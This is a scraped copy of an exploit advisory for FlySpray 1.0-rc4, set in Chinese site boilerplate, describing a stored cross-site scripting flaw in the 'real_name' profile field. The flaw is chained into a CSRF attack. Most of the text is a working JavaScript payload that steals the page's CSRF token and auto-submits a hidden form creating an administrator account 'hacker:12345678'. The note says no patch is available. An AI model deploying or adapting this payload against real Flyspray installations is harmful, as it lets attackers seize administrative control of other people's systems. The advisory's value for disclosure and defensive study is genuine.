扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
# Exploit Title: XSRF Stored FlySpray 1.0-rc4 (XSS2CSRF add admin account) # Date: 19/04/2017 # Exploit Author: Cyril Vallicari / HTTPCS / ZIWIT : https://www.openoffice.org # Version: 1.0-rc4 # Tested on: Windows 7 x64 SP1 / Kali Linux Description : A vulnerability has been discovered in Flyspray , which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed via the 'real_name' parameter to '/index.php?do=myprofile' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The script is executed on the parameter page AND on any page that allow the user to put a comment. This XSS vector allow to execute scripts to gather the CSRF token and submit a form to create a new admin Here's the script : var tok = document.getElementsByName('csrftoken')[0].value; var txt = '<form method="POST" id="hacked_form" action="index.php?do=admin&area=newuser">' txt += '<input type="hidden" name="action" value="admin.newuser"/>' txt += '<input type="hidden" name="do" value="admin"/>' txt += '<input type="hidden" name="area" value="newuser"/>' txt += '<input type="hidden" name="user_name" value="hacker"/>' txt += '<input type="hidden" name="csrftoken" value="' + tok + '"/>' txt += '<input type="hidden" name="user_pass" value="12345678"/>' txt += '<input type="hidden" name="user_pass2" value="12345678"/>' txt += '<input type="hidden" name="real_name" value="root"/>' txt += '<input type="hidden" name="email_address" value="root@root.com"/>' txt += '<input type="hidden" name="verify_email_address" value=" root@root.com"/>' txt += '<input type="hidden" name="jabber_id" value=""/>' txt += '<input type="hidden" name="notify_type" value="0"/>' txt += '<input type="hidden" name="time_zone" value="0"/>' txt += '<input type="hidden" name="group_in" value="1"/>' txt += '</form>' var d1 = document.getElementById('menu'); d1.insertAdjacentHTML('afterend', txt); document.getElementById("hacked_form").submit(); This will create a new admin account, hacker:12345678 POC video : *https://www.youtube.com/watch?v=eCf9a0QpnPs Patch : No patch yet |
体验盒子
